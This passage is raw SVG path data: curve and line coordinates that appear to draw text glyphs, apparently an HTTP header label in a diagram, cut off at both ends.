C20.2433342,69.5286431 20.4946338,69.0494812 20.8201562,68.6328125 C21.1456787,68.2161438 21.5649453,67.88672 22.0779687,67.6445312 C22.5909921,67.4023425 23.162601,67.28125 23.7928125,67.28125 C24.2042729,67.28125 24.614425,67.335937 25.0232812,67.4453125 C25.4321374,67.554688 25.7355198,67.6848951 25.9334375,67.8359375 L25.62875,68.5625 C25.092289,68.2604152 24.4568786,68.109375 23.7225,68.109375 C22.8318705,68.109375 22.1261484,68.4466112 21.6053125,69.1210938 C21.0844765,69.7955763 20.8240625,70.6900986 20.8240625,71.8046875 C20.8240625,72.8724012 21.0831745,73.7356738 21.6014062,74.3945312 C22.119638,75.0533887 22.8266622,75.3828125 23.7225,75.3828125 C24.3475031,75.3828125 25.0193714,75.2265641 25.738125,74.9140625 L25.8865625,75.609375 C25.6417696,75.7916676 25.3240644,75.9335932 24.9334375,76.0351562 C24.5428105,76.1367193 24.1521894,76.1875 23.7615625,76.1875 Z M31.9978124,76.1875 C30.8155149,76.1875 29.8767222,75.7916706 29.1814062,75 C28.4860902,74.2083294 28.1384374,73.1354234 28.1384374,71.78125 C28.1384374,70.4739518 28.4782778,69.40365 29.1579687,68.5703125 C29.8376596,67.736975 30.7165571,67.3072918 31.7946874,67.28125 C32.7999008,67.28125 33.6071844,67.6406214 34.2165624,68.359375 C34.8259405,69.0781286 35.1306249,70.0416606 35.1306249,71.25 C35.1306249,71.2968752 35.1293229,71.3919264 35.1267187,71.5351562 C35.1241145,71.6783861 35.1228124,71.7786455 35.1228124,71.8359375 L29.1618749,71.8359375 C29.1722917,72.9349013 29.437914,73.8059864 29.9587499,74.4492188 C30.4795859,75.0924511 31.167079,75.4140625 32.0212499,75.4140625 C32.5785444,75.4140625 33.0629146,75.348959 33.4743749,75.21875 C33.8858353,75.088541 34.3155185,74.903647 34.7634374,74.6640625 L34.9274999,75.390625 C34.0629123,75.9218777 33.0863596,76.1875 31.9978124,76.1875 Z M29.2009374,71.0546875 L34.0759374,71.0546875 C34.0759374,70.1015577 33.8702103,69.3710963 33.4587499,68.8632812 C33.0472896,68.3554662 32.482191,68.1015625 31.7634374,68.1015625 C31.0342671,68.1015625 30.4457314,68.3723931 29.9978124,68.9140625 C29.5498935,69.4557319 29.2842712,70.1692664 29.2009374,71.0546875 Z M40.3981249,76.1953125 C39.8460388,76.1953125 39.3278149,76.1276048 38.8434374,75.9921875 C38.35906,75.8567702 37.9762513,75.6953134 37.6949999,75.5078125 L37.8356249,74.6953125 C38.6950042,75.1432314 39.5179127,75.3671875 40.3043749,75.3671875 C41.7158403,75.3671875 42.4476038,74.8437552 42.4996874,73.796875 C42.4996874,73.3593728 42.3577618,73.0156262 42.0739062,72.765625 C41.7900506,72.5156238 41.2210459,72.2552097 40.3668749,71.984375 C39.918956,71.8281242 39.6715627,71.7421876 39.6246874,71.7265625 C38.2861391,71.3203105 37.6116667,70.5989635 37.6012499,69.5625 C37.6012499,68.9635387 37.8655702,68.4335961 38.3942187,67.9726562 C38.9228672,67.5117164 39.6377038,67.28125 40.5387499,67.28125 C41.4397961,67.28125 42.2861418,67.4583316 43.0778124,67.8125 L42.7496874,68.53125 C41.9476001,68.2291652 41.2028159,68.078125 40.5153124,68.078125 C39.9111427,68.078125 39.4358871,68.2135403 39.0895312,68.484375 C38.7431753,68.7552097 38.5699999,69.1197894 38.5699999,69.578125 C38.5699999,69.9635436 38.6832801,70.2591136 38.9098437,70.4648438 C39.1364073,70.6705739 39.5856216,70.8671866 40.2574999,71.0546875 C40.330417,71.0755209 40.4645302,71.1223955 40.6598437,71.1953125 C40.8551572,71.2682295 40.963229,71.3072916 40.9840624,71.3125 C41.8851086,71.588543 42.5140086,71.9153627 42.8707812,72.2929688 C43.2275538,72.6705748 43.4059374,73.1848926 43.4059374,73.8359375 C43.3903124,74.5859413 43.1103672,75.1666646 42.5660937,75.578125 C42.0218201,75.9895854 41.2991711,76.1953125 40.3981249,76.1953125 Z M48.6031249,76.1953125 C48.0510388,76.1953125 47.5328148,76.1276048 47.0484374,75.9921875 C46.56406,75.8567702 46.1812513,75.6953134 45.8999999,75.5078125 L46.0406249,74.6953125 C46.9000042,75.1432314 47.7229127,75.3671875 48.5093749,75.3671875 C49.9208403,75.3671875 50.6526038,74.8437552 50.7046874,73.796875 C50.7046874,73.3593728 50.5627618,73.0156262 50.2789062,72.765625 C49.9950506,72.5156238 49.4260459,72.2552097 48.5718749,71.984375 C48.123956,71.8281242 47.8765627,71.7421876 47.8296874,71.7265625 C46.4911391,71.3203105 45.8166666,70.5989635 45.8062499,69.5625 C45.8062499,68.9635387 46.0705702,68.4335961 46.5992187,67.9726562 C47.1278671,67.5117164 47.8427037,67.28125 48.7437499,67.28125 C49.6447961,67.28125 50.4911418,67.4583316 51.2828124,67.8125 L50.9546874,68.53125 C50.1526001,68.2291652 49.4078159,68.078125 48.7203124,68.078125 C48.1161427,68.078125 47.6408871,68.2135403 47.2945312,68.484375 C46.9481753,68.7552097 46.7749999,69.1197894 46.7749999,69.578125 C46.7749999,69.9635436 46.88828,70.2591136 47.1148437,70.4648438 C47.3414073,70.6705739 47.7906216,70.8671866 48.4624999,71.0546875 C48.5354169,71.0755209 48.6695302,71.1223955 48.8648437,71.1953125 C49.0601571,71.2682295 49.168229,71.3072916 49.1890624,71.3125 C50.0901086,71.588543 50.7190085,71.9153627 51.0757812,72.2929688 C51.4325538,72.6705748 51.6109374,73.1848926 51.6109374,73.8359375 C51.5953123,74.5859413 51.3153672,75.1666646 50.7710937,75.578125 C50.2268201,75.9895854 49.5041711,76.1953125 48.6031249,76.1953125 Z M53.8862499,71.8515625 L53.8862499,70.9921875 L57.6674999,70.9921875 L57.6674999,71.8515625 L53.8862499,71.8515625 Z M65.5756249,76.1796875 C64.6849954,76.1796875 63.8907325,76.0273453 63.1928124,75.7226562 C62.4948922,75.4179672 61.9258875,74.9947944 61.4857811,74.453125 C61.0456748,73.9114556 60.7123448,73.2760453 60.4857811,72.546875 C60.2592175,71.8177047 60.1459374,71.0182335 60.1459374,70.1484375 C60.1459374,68.9921817 60.3581748,67.9674524 60.7826561,67.0742188 C61.2071374,66.1809851 61.8412457,65.4739609 62.6849999,64.953125 C63.5287541,64.4322891 64.52614,64.171875 65.6771874,64.171875 C66.9428187,64.171875 68.0209329,64.4374973 68.9115624,64.96875 L68.4349999,65.7421875 C67.6224958,65.2526017 66.7058383,65.0078125 65.6849999,65.0078125 C64.9714546,65.0078125 64.3308361,65.1419257 63.7631249,65.4101562 C63.1954137,65.6783868 62.7305746,66.0494768 62.3685936,66.5234375 C62.0066127,66.9973982 61.7305738,67.5468719 61.5404686,68.171875 C61.3503635,68.7968781 61.2553124,69.4739547 61.2553124,70.203125 C61.2553124,70.9166702 61.3425511,71.5768199 61.5170311,72.1835938 C61.6915112,72.7903676 61.9545294,73.3320289 62.3060936,73.8085938 C62.6576579,74.2851586 63.1251011,74.6601549 63.7084374,74.9335938 C64.2917736,75.2070326 64.9636419,75.34375 65.7240624,75.34375 C66.5417748,75.34375 67.453224,75.1171898 68.4584374,74.6640625 L68.6615624,75.46875 C67.9011419,75.9427107 66.8725064,76.1796875 65.5756249,76.1796875 Z M74.7962499,75.4140625 C75.421253,75.4140625 75.9485915,75.2486996 76.3782811,74.9179688 C76.8079708,74.5872379 77.1204676,74.1510444 77.3157811,73.609375 C77.5110946,73.0677056 77.6087499,72.445316 77.6087499,71.7421875 C77.6087499,70.6380153 77.3743772,69.7500034 76.9056249,69.078125 C76.4368725,68.4062466 75.723338,68.0703125 74.7649999,68.0703125 C74.1399967,68.0703125 73.60745,68.2382796 73.1673436,68.5742188 C72.7272372,68.9101579 72.4056259,69.3502577 72.2024999,69.8945312 C71.9993739,70.4388048 71.8978124,71.0624965 71.8978124,71.765625 C71.8978124,72.8333387 72.1465078,73.7083299 72.6439061,74.390625 C73.1413044,75.0729201 73.8587452,75.4140625 74.7962499,75.4140625 Z M74.7259374,76.1875 C73.9498918,76.1875 73.2663049,75.9921895 72.6751561,75.6015625 C72.0840073,75.2109355 71.633491,74.6809929 71.3235936,74.0117188 C71.0136962,73.3424446 70.8587499,72.5859417 70.8587499,71.7421875 C70.8587499,71.1067677 70.9485927,70.5169298 71.1282811,69.9726562 C71.3079695,69.4283827 71.5644774,68.9570332 71.8978124,68.5585938 C72.2311474,68.1601543 72.6452057,67.8476574 73.1399999,67.6210938 C73.634794,67.3945301 74.1842677,67.28125 74.7884374,67.28125 C75.5905247,67.28125 76.2858303,67.4778626 76.8743749,67.8710938 C77.4629195,68.2643249 77.9043213,68.7929654 78.1985936,69.4570312 C78.4928659,70.1210971 78.6399999,70.8775999 78.6399999,71.7265625 C78.6399999,72.5807334 78.4889597,73.3411425 78.1868749,74.0078125 C77.88479,74.6744825 77.4342737,75.2044251 76.8353124,75.5976562 C76.236351,75.9908874 75.5332331,76.1875 74.7259374,76.1875 Z M81.3762498,76 L81.3762498,67.4375 L82.2199998,67.4375 L82.3528123,68.7578125 C82.6601056,68.2994769 83.0728618,67.9388034 83.5910936,67.6757812 C84.1093254,67.4127591 84.6679135,67.28125 85.2668748,67.28125 C86.2512548,67.28125 86.9752059,67.5520806 87.4387498,68.09375 C87.9022938,68.6354194 88.1340623,69.4999941 88.1340623,70.6875 L88.1340623,76 L87.1574998,76 L87.1574998,70.25 C87.1314581,69.4895795 86.9700013,68.94271 86.6731248,68.609375 C86.3762484,68.27604 85.8892741,68.109375 85.2121873,68.109375 C84.4361418,68.109375 83.8020336,68.3046855 83.3098436,68.6953125 C82.8176536,69.0859395 82.509063,69.5911427 82.3840623,70.2109375 C82.3632289,70.4557304 82.3528123,70.7109362 82.3528123,70.9765625 L82.3528123,76 L81.3762498,76 Z M93.6203123,76.1796875 C92.9015587,76.1796875 92.3755223,76.0169287 92.0421873,75.6914062 C91.7088523,75.3658838 91.5421873,74.8359412 91.5421873,74.1015625 L91.5421873,68.1484375 L90.3312498,68.1484375 L90.4015623,67.5625 L91.5578123,67.453125 L91.8156248,65.4921875 L92.4953123,65.4453125 L92.4953123,67.4375 L94.9953123,67.4375 L94.9953123,68.1484375 L92.4953123,68.1484375 L92.4953123,73.8984375 C92.4953123,74.5026072 92.5942697,74.9075511 92.7921873,75.1132812 C92.990105,75.3190114 93.3390598,75.421875 93.8390623,75.421875 C94.1619806,75.421875 94.5630183,75.3619798 95.0421873,75.2421875 L95.0812498,75.9921875 C94.4510383,76.1171881 93.9640641,76.1796875 93.6203123,76.1796875 Z M97.3331248,76 C97.3227081,70.9739332 97.3174998,68.1197951 97.3174998,67.4375 L98.1143748,67.4375 L98.1768748,69.125 C98.484168,68.6145808 98.8747891,68.1979183 99.3487498,67.875 C99.8227105,67.5520817 100.317497,67.390625 100.833125,67.390625 C101.046668,67.390625 101.275832,67.408854 101.520625,67.4453125 L101.450312,68.25 C101.262811,68.2187498 101.064897,68.203125 100.856562,68.203125 C100.1326,68.203125 99.5245335,68.4882784 99.0323436,69.0585938 C98.5401536,69.6289091 98.2940623,70.3046836 98.2940623,71.0859375 L98.2940623,76 L97.3331248,76 Z M107.131875,75.4140625 C107.756878,75.4140625 108.284216,75.2486996 108.713906,74.9179688 C109.143596,74.5872379 109.456093,74.1510444 109.651406,73.609375 C109.84672,73.0677056 109.944375,72.445316 109.944375,71.7421875 C109.944375,70.6380153 109.710002,69.7500034 109.24125,69.078125 C108.772497,68.4062466 108.058963,68.0703125 107.100625,68.0703125 C106.475622,68.0703125 105.943075,68.2382796 105.502969,68.5742188 C105.062862,68.9101579 104.741251,69.3502577 104.538125,69.8945312 C104.334999,70.4388048 104.233437,71.0624965 104.233437,71.765625 C104.233437,72.8333387 104.482133,73.7083299 104.979531,74.390625 C105.476929,75.0729201 106.19437,75.4140625 107.131875,75.4140625 Z M107.061562,76.1875 C106.285517,76.1875 105.60193,75.9921895 105.010781,75.6015625 C104.419632,75.2109355 103.969116,74.6809929 103.659219,74.0117188 C103.349321,73.3424446 103.194375,72.5859417 103.194375,71.7421875 C103.194375,71.1067677 103.284218,70.5169298 103.463906,69.9726562 C103.643594,69.4283827 103.900102,68.9570332 104.233437,68.5585938 C104.566772,68.1601543 104.980831,67.8476574 105.475625,67.6210938 C105.970419,67.3945301 106.519893,67.28125 107.124062,67.28125 C107.92615,67.28125 108.621455,67.4778626 109.21,67.8710938 C109.798544,68.2643249 110.239946,68.7929654 110.534219,69.4570312 C110.828491,70.1210971 110.975625,70.8775999 110.975625,71.7265625 C110.975625,72.5807334 110.824585,73.3411425 110.5225,74.0078125 C110.220415,74.6744825 109.769899,75.2044251 109.170937,75.5976562 C108.571976,75.9908874 107.868858,76.1875 107.061562,76.1875 Z M115.868125,76.1796875 C115.149371,76.1796875 114.623335,76.0169287 114.29,75.6914062 C113.956665,75.3658838 113.79,74.8359412 113.79,74.1015625 L113.79,64.109375 L114.743125,64.03125 L114.743125,74.046875 C114.743125,74.5677109 114.838176,74.9270823 115.028281,75.125 C115.218386,75.3229177 115.506144,75.421875 115.891562,75.421875 C116.204064,75.421875 116.594685,75.3619798 117.063437,75.2421875 L117.1025,75.9921875 C116.592081,76.1171881 116.180626,76.1796875 115.868125,76.1796875 Z M118.659062,71.8515625 L118.659062,70.9921875 L122.440312,70.9921875 L122.440312,71.8515625 L118.659062,71.8515625 Z M125.41875,76 L125.41875,64.375 L128.73125,64.375 C129.153127,64.375 129.519009,64.3828124 129.828906,64.3984375 C130.138803,64.4140626 130.455206,64.4479164 130.778125,64.5 C131.101043,64.5520836 131.37578,64.6210933 131.602343,64.7070312 C131.828907,64.7929692 132.045051,64.9088534 132.250781,65.0546875 C132.456511,65.2005216 132.621874,65.3763011 132.746875,65.5820312 C132.871875,65.7877614 132.969531,66.0338527 133.039843,66.3203125 C133.110156,66.6067723 133.145312,66.9322898 133.145312,67.296875 C133.145312,68.0104202 132.970835,68.6223933 132.621875,69.1328125 C132.272915,69.6432317 131.739066,69.9895824 131.020312,70.171875 C131.332814,70.8125032 131.567186,71.2994775 131.723437,71.6328125 L133.629687,76 L132.465625,76 L130.825,72.0234375 C130.715624,71.7630195 130.470835,71.2005252 130.090625,70.3359375 C129.986458,70.3515626 129.601045,70.359375 128.934375,70.359375 L126.41875,70.3125 L126.41875,76 L125.41875,76 Z M129.364062,69.53125 C130.400526,69.53125 131.124477,69.3502622 131.535937,68.9882812 C131.947398,68.6263003 132.153125,68.0677121 132.153125,67.3125 C132.153125,66.6354133 131.966929,66.1158872 131.594531,65.7539062 C131.222133,65.3919253 130.588025,65.2109375 129.692187,65.2109375 L126.41875,65.2109375 L126.41875,69.5078125 C127.642714,69.5234376 128.624475,69.53125 129.364062,69.53125 Z M139.858125,76.1875 C138.675827,76.1875 137.737034,75.7916706 137.041718,75 C136.346403,74.2083294 135.99875,73.1354234 135.99875,71.78125 C135.99875,70.4739518 136.33859,69.40365 137.018281,68.5703125 C137.697972,67.736975 138.576869,67.3072918 139.655,67.28125 C140.660213,67.28125 141.467497,67.6406214 142.076875,68.359375 C142.686253,69.0781286 142.990937,70.0416606 142.990937,71.25 C142.990937,71.2968752 142.989635,71.3919264 142.987031,71.5351562 C142.984427,71.6783861 142.983125,71.7786455 142.983125,71.8359375 L137.022187,71.8359375 C137.032604,72.9349013 137.298226,73.8059864 137.819062,74.4492188 C138.339898,75.0924511 139.027391,75.4140625 139.881562,75.4140625 C140.438857,75.4140625 140.923227,75.348959 141.334687,75.21875 C141.746148,75.088541 142.175831,74.903647 142.62375,74.6640625 L142.787812,75.390625 C141.923225,75.9218777 140.946672,76.1875 139.858125,76.1875 Z M137.06125,71.0546875 L141.93625,71.0546875 C141.93625,70.1015577 141.730523,69.3710963 141.319062,68.8632812 C140.907602,68.3554662 140.342503,68.1015625 139.62375,68.1015625 C138.894579,68.1015625 138.306044,68.3723931 137.858125,68.9140625 C137.410206,69.4557319 137.144583,70.1692664 137.06125,71.0546875 Z M151.70375,79.8125 L151.70375,75.8984375 C151.70375,75.4609353 151.71677,75.0651059 151.742812,74.7109375 C151.440727,75.1953149 151.027971,75.5624988 150.504531,75.8125 C149.981091,76.0625012 149.458961,76.1875 148.938125,76.1875 C148.188121,76.1875 147.53969,75.9973977 146.992812,75.6171875 C146.445934,75.2369773 146.038386,74.7226595 145.770156,74.0742188 C145.501925,73.425778 145.367812,72.6822959 145.367812,71.84375 C145.367812,70.9427038 145.501925,70.1536492 145.770156,69.4765625 C146.038386,68.7994758 146.449841,68.2643249 147.004531,67.8710938 C147.559221,67.4778626 148.224579,67.28125 149.000625,67.28125 C150.068338,67.28125 150.982392,67.763016 151.742812,68.7265625 L151.805312,67.4375 L152.6725,67.4375 L152.6725,79.7578125 L151.70375,79.8125 Z M148.938125,75.34375 C150.740217,75.34375 151.65427,74.195324 151.680312,71.8984375 C151.680312,71.3151012 151.632136,70.7994814 151.535781,70.3515625 C151.439426,69.9036436 151.287084,69.5091163 151.07875,69.1679688 C150.870415,68.8268212 150.586564,68.5664071 150.227187,68.3867188 C149.86781,68.2070304 149.435523,68.1171875 148.930312,68.1171875 C148.560519,68.1171875 148.228491,68.1874993 147.934218,68.328125 C147.639946,68.4687507 147.399063,68.6562488 147.211562,68.890625 C147.024061,69.1250012 146.866511,69.4010401 146.738906,69.71875 C146.611301,70.0364599 146.521458,70.3632796 146.469375,70.6992188 C146.417291,71.0351579 146.39125,71.3854148 146.39125,71.75 C146.39125,72.2343774 146.43552,72.6822896 146.524062,73.09375 C146.612604,73.5052104 146.751926,73.8841129 146.942031,74.2304688 C147.132136,74.5768246 147.397758,74.8489573 147.738906,75.046875 C148.080054,75.2447927 148.479789,75.34375 148.938125,75.34375 Z M158.986875,76.2109375 C158.538956,76.2109375 158.123595,76.1601568 157.740781,76.0585938 C157.357967,75.9570307 157.002501,75.7981782 156.674375,75.5820312 C156.346248,75.3658843 156.087136,75.0598978 155.897031,74.6640625 C155.706926,74.2682272 155.611875,73.802086 155.611875,73.265625 L155.611875,67.4375 L156.580625,67.4375 L156.580625,73.2890625 C156.580625,73.6953145 156.643124,74.0390611 156.768125,74.3203125 C156.893125,74.6015639 157.072811,74.8138014 157.307187,74.9570312 C157.541563,75.1002611 157.791561,75.2005205 158.057187,75.2578125 C158.322814,75.3151045 158.632706,75.34375 158.986875,75.34375 C159.335835,75.34375 159.643123,75.3138024 159.90875,75.2539062 C160.174376,75.1940101 160.421769,75.0911466 160.650937,74.9453125 C160.880105,74.7994784 161.055885,74.587241 161.178281,74.3085938 C161.300677,74.0299465 161.361875,73.6901062 161.361875,73.2890625 L161.361875,67.4375 L162.330625,67.4375 L162.330625,73.265625 C162.330625,73.7031272 162.268125,74.0937483 162.143125,74.4375 C162.018124,74.7812517 161.851459,75.0624989 161.643125,75.28125 C161.43479,75.5000011 161.183491,75.6809889 160.889218,75.8242188 C160.594946,75.9674486 160.292866,76.067708 159.982968,76.125 C159.673071,76.182292 159.341043,76.2109375 158.986875,76.2109375 Z M168.73875,76.1875 C167.556452,76.1875 166.617659,75.7916706 165.922343,75 C165.227027,74.2083294 164.879375,73.1354234 164.879375,71.78125 C164.879375,70.4739518 165.219215,69.40365 165.898906,68.5703125 C166.578597,67.736975 167.457494,67.3072918 168.535625,67.28125 C169.540838,67.28125 170.348122,67.6406214 170.9575,68.359375 C171.566878,69.0781286 171.871562,70.0416606 171.871562,71.25 C171.871562,71.2968752 171.87026,71.3919264 171.867656,71.5351562 C171.865052,71.6783861 171.86375,71.7786455 171.86375,71.8359375 L165.902812,71.8359375 C165.913229,72.9349013 166.178851,73.8059864 166.699687,74.4492188 C167.220523,75.0924511 167.908016,75.4140625 168.762187,75.4140625 C169.319482,75.4140625 169.803852,75.348959 170.215312,75.21875 C170.626773,75.088541 171.056456,74.903647 171.504375,74.6640625 L171.668437,75.390625 C170.80385,75.9218777 169.827297,76.1875 168.73875,76.1875 Z M165.941875,71.0546875 L170.816875,71.0546875 C170.816875,70.1015577 170.611148,69.3710963 170.199687,68.8632812 C169.788227,68.3554662 169.223128,68.1015625 168.504375,68.1015625 C167.775204,68.1015625 167.186669,68.3723931 166.73875,68.9140625 C166.290831,69.4557319 166.025208,70.1692664 165.941875,71.0546875 Z M177.139062,76.1953125 C176.586976,76.1953125 176.068752,76.1276048 175.584375,75.9921875 C175.099997,75.8567702 174.717189,75.6953134 174.435937,75.5078125 L174.576562,74.6953125 C175.435941,75.1432314 176.25885,75.3671875 177.045312,75.3671875 C178.456778,75.3671875 179.188541,74.8437552 179.240625,73.796875 C179.240625,73.3593728 179.098699,73.0156262 178.814843,72.765625 C178.530988,72.5156238 177.961983,72.2552097 177.107812,71.984375 C176.659893,71.8281242 176.4125,71.7421876 176.365625,71.7265625 C175.027076,71.3203105 174.352604,70.5989635 174.342187,69.5625 C174.342187,68.9635387 174.606507,68.4335961 175.135156,67.9726562 C175.663804,67.5117164 176.378641,67.28125 177.279687,67.28125 C178.180733,67.28125 179.027079,67.4583316 179.81875,67.8125 L179.490625,68.53125 C178.688537,68.2291652 177.943753,68.078125 177.25625,68.078125 C176.65208,68.078125 176.176824,68.2135403 175.830468,68.484375 C175.484113,68.7552097 175.310937,69.1197894 175.310937,69.578125 C175.310937,69.9635436 175.424217,70.2591136 175.650781,70.4648438 C175.877345,70.6705739 176.326559,70.8671866 176.998437,71.0546875 C177.071354,71.0755209 177.205467,71.1223955 177.400781,71.1953125 C177.596094,71.2682295 177.704166,71.3072916 177.725,71.3125 C178.626046,71.588543 179.254946,71.9153627 179.611718,72.2929688 C179.968491,72.6705748 180.146875,73.1848926 180.146875,73.8359375 C180.13125,74.5859413 179.851304,75.1666646 179.307031,75.578125 C178.762757,75.9895854 178.040108,76.1953125 177.139062,76.1953125 Z M185.258125,76.1796875 C184.539371,76.1796875 184.013335,76.0169287 183.68,75.6914062 C183.346665,75.3658838 183.18,74.8359412 183.18,74.1015625 L183.18,68.1484375 L181.969062,68.1484375 L182.039375,67.5625 L183.195625,67.453125 L183.453437,65.4921875 L184.133125,65.4453125 L184.133125,67.4375 L186.633125,67.4375 L186.633125,68.1484375 L184.133125,68.1484375 L184.133125,73.8984375 C184.133125,74.5026072 184.232082,74.9075511 184.43,75.1132812 C184.627917,75.3190114 184.976872,75.421875 185.476875,75.421875 C185.799793,75.421875 186.200831,75.3619798 186.68,75.2421875 L186.719062,75.9921875 C186.088851,76.1171881 185.601876,76.1796875 185.258125,76.1796875 Z M188.533437,71.8515625 L188.533437,70.9921875 L192.314687,70.9921875 L192.314687,71.8515625 L188.533437,71.8515625 Z M195.293125,76 L195.293125,64.375 L196.699375,64.375 L201.004062,74.1953125 L205.191562,64.375 L206.543125,64.375 L206.543125,76 L205.550937,76 L205.550937,68.1796875 L205.605625,65.5390625 L205.316562,66.4765625 L201.49625,75.3359375 L200.4025,75.3359375 L196.535312,66.453125 L196.230625,65.515625 L196.285312,68.21875 L196.285312,76 L195.293125,76 Z M213.412187,76.1875 C212.22989,76.1875 211.291097,75.7916706 210.595781,75 C209.900465,74.2083294 209.552812,73.1354234 209.552812,71.78125 C209.552812,70.4739518 209.892652,69.40365 210.572343,68.5703125 C211.252034,67.736975 212.130932,67.3072918 213.209062,67.28125 C214.214275,67.28125 215.021559,67.6406214 215.630937,68.359375 C216.240315,69.0781286 216.545,70.0416606 216.545,71.25 C216.545,71.2968752 216.543698,71.3919264 216.541093,71.5351562 C216.538489,71.6783861 216.537187,71.7786455 216.537187,71.8359375 L210.57625,71.8359375 C210.586666,72.9349013 210.852289,73.8059864 211.373125,74.4492188 C211.893961,75.0924511 212.581454,75.4140625 213.435625,75.4140625 C213.992919,75.4140625 214.477289,75.348959 214.88875,75.21875 C215.30021,75.088541 215.729893,74.903647 216.177812,74.6640625 L216.341875,75.390625 C215.477287,75.9218777 214.500734,76.1875 213.412187,76.1875 Z M210.615312,71.0546875 L215.490312,71.0546875 C215.490312,70.1015577 215.284585,69.3710963 214.873125,68.8632812 C214.461664,68.3554662 213.896566,68.1015625 213.177812,68.1015625 C212.448642,68.1015625 211.860106,68.3723931 211.412187,68.9140625 C210.964268,69.4557319 210.698646,70.1692664 210.615312,71.0546875 Z M221.726562,76.1796875 C221.007808,76.1796875 220.481772,76.0169287 220.148437,75.6914062 C219.815102,75.3658838 219.648437,74.8359412 219.648437,74.1015625 L219.648437,68.1484375 L218.4375,68.1484375 L218.507812,67.5625 L219.664062,67.453125 L219.921875,65.4921875 L220.601562,65.4453125 L220.601562,67.4375 L223.101562,67.4375 L223.101562,68.1484375 L220.601562,68.1484375 L220.601562,73.8984375 C220.601562,74.5026072 220.700519,74.9075511 220.898437,75.1132812 C221.096355,75.3190114 221.44531,75.421875 221.945312,75.421875 C222.26823,75.421875 222.669268,75.3619798 223.148437,75.2421875 L223.1875,75.9921875 C222.557288,76.1171881 222.070314,76.1796875 221.726562,76.1796875 Z M225.42375,76 L225.42375,64.1171875 L226.3925,64.03125 L226.3925,68.34375 C226.3925,68.3854169 226.391197,68.4088541 226.388593,68.4140625 C226.385989,68.4192709 226.383385,68.4479164 226.380781,68.5 L226.369062,68.734375 C227.066982,67.7656202 228.066972,67.28125 229.369062,67.28125 C231.228446,67.28125 232.158125,68.4036346 232.158125,70.6484375 L232.158125,76 L231.197187,76 L231.197187,70.8359375 C231.197187,69.872391 231.048751,69.1757834 230.751875,68.7460938 C230.454998,68.3164041 229.931566,68.1015625 229.181562,68.1015625 C228.436767,68.1015625 227.816981,68.2981751 227.322187,68.6914062 C226.827393,69.0846374 226.522708,69.5911427 226.408125,70.2109375 C226.397708,70.4192719 226.3925,70.7291646 226.3925,71.140625 L226.3925,76 L225.42375,76 Z M238.777187,75.4140625 C239.40219,75.4140625 239.929529,75.2486996 240.359218,74.9179688 C240.788908,74.5872379 241.101405,74.1510444 241.296718,73.609375 C241.492032,73.0677056 241.589687,72.445316 241.589687,71.7421875 C241.589687,70.6380153 241.355314,69.7500034 240.886562,69.078125 C240.41781,68.4062466 239.704275,68.0703125 238.745937,68.0703125 C238.120934,68.0703125 237.588387,68.2382796 237.148281,68.5742188 C236.708174,68.9101579 236.386563,69.3502577 236.183437,69.8945312 C235.980311,70.4388048 235.87875,71.0624965 235.87875,71.765625 C235.87875,72.8333387 236.127445,73.7083299 236.624843,74.390625 C237.122242,75.0729201 237.839682,75.4140625 238.777187,75.4140625 Z M238.706875,76.1875 C237.930829,76.1875 237.247242,75.9921895 236.656093,75.6015625 C236.064945,75.2109355 235.614428,74.6809929 235.304531,74.0117188 C234.994633,73.3424446 234.839687,72.5859417 234.839687,71.7421875 C234.839687,71.1067677 234.92953,70.5169298 235.109218,69.9726562 C235.288907,69.4283827 235.545415,68.9570332 235.87875,68.5585938 C236.212085,68.1601543 236.626143,67.8476574 237.120937,67.6210938 C237.615731,67.3945301 238.165205,67.28125 238.769375,67.28125 C239.571462,67.28125 240.266767,67.4778626 240.855312,67.8710938 C241.443857,68.2643249 241.885258,68.7929654 242.179531,69.4570312 C242.473803,70.1210971 242.620937,70.8775999 242.620937,71.7265625 C242.620937,72.5807334 242.469897,73.3411425 242.167812,74.0078125 C241.865727,74.6744825 241.415211,75.2044251 240.81625,75.5976562 C240.217288,75.9908874 239.51417,76.1875 238.706875,76.1875 Z M248.591562,76.1796875 C247.450931,76.1796875 246.561617,75.7838581 245.923593,74.9921875 C245.285569,74.2005169 244.966562,73.1067778 244.966562,71.7109375 C244.966562,70.3984309 245.295986,69.3320354 245.954843,68.5117188 C246.613701,67.6914021 247.482182,67.28125 248.560312,67.28125 C249.091565,67.28125 249.622809,67.3958322 250.154062,67.625 C250.685315,67.8541678 251.088956,68.2109351 251.365,68.6953125 L251.365,64.1171875 L252.3025,64.03125 L252.3025,76 L251.497812,76 L251.357187,74.7109375 C251.060311,75.1953149 250.657971,75.5611967 250.150156,75.8085938 C249.642341,76.0559908 249.122815,76.1796875 248.591562,76.1796875 Z M248.568125,75.4140625 C249.052502,75.4140625 249.476977,75.3255217 249.841562,75.1484375 C250.206147,74.9713533 250.497811,74.7213558 250.716562,74.3984375 C250.935313,74.0755192 251.098072,73.7044292 251.204843,73.2851562 C251.311615,72.8658833 251.365,72.4010442 251.365,71.890625 C251.365,69.3437373 250.427509,68.0703125 248.5525,68.0703125 C248.109789,68.0703125 247.719168,68.1757802 247.380625,68.3867188 C247.042081,68.5976573 246.775157,68.8815086 246.579843,69.2382812 C246.38453,69.5950539 246.24,69.9830708 246.14625,70.4023438 C246.052499,70.8216167 246.005625,71.2630185 246.005625,71.7265625 C246.005625,72.1276062 246.03427,72.5039045 246.091562,72.8554688 C246.148854,73.207033 246.242603,73.5416651 246.372812,73.859375 C246.503021,74.1770849 246.664478,74.4492176 246.857187,74.6757812 C247.049896,74.9023449 247.292081,75.0820306 247.58375,75.2148438 C247.875418,75.3476569 248.203539,75.4140625 248.568125,75.4140625 Z M255.585625,76.2890625 L255.585625,74.640625 L256.984062,74.640625 L256.984062,76.2890625 L255.585625,76.2890625 Z M255.585625,68.7578125 L255.585625,67.125 L256.984062,67.125 L256.984062,68.7578125 L255.585625,68.7578125 Z M265.964374,75.1640625 L268.245624,75.1640625 C269.860216,75.1640625 271.090672,74.7513062 271.937031,73.9257812 C272.783389,73.1002563 273.206562,71.8697998 273.206562,70.234375 C273.206562,69.3385372 273.088074,68.5651074 272.851093,67.9140625 C272.614113,67.2630176 272.26646,66.7408874 271.808124,66.3476562 C271.349789,65.9544251 270.808128,65.6653655 270.183124,65.4804688 C269.558121,65.295572 268.836774,65.203125 268.019062,65.203125 L265.964374,65.203125 L265.964374,75.1640625 Z M264.964374,76 L264.964374,64.375 L268.112812,64.375 C269.060733,64.375 269.908381,64.486978 270.655781,64.7109375 C271.40318,64.934897 272.052913,65.2773414 272.604999,65.7382812 C273.157086,66.1992211 273.58156,66.8059858 273.878437,67.5585938 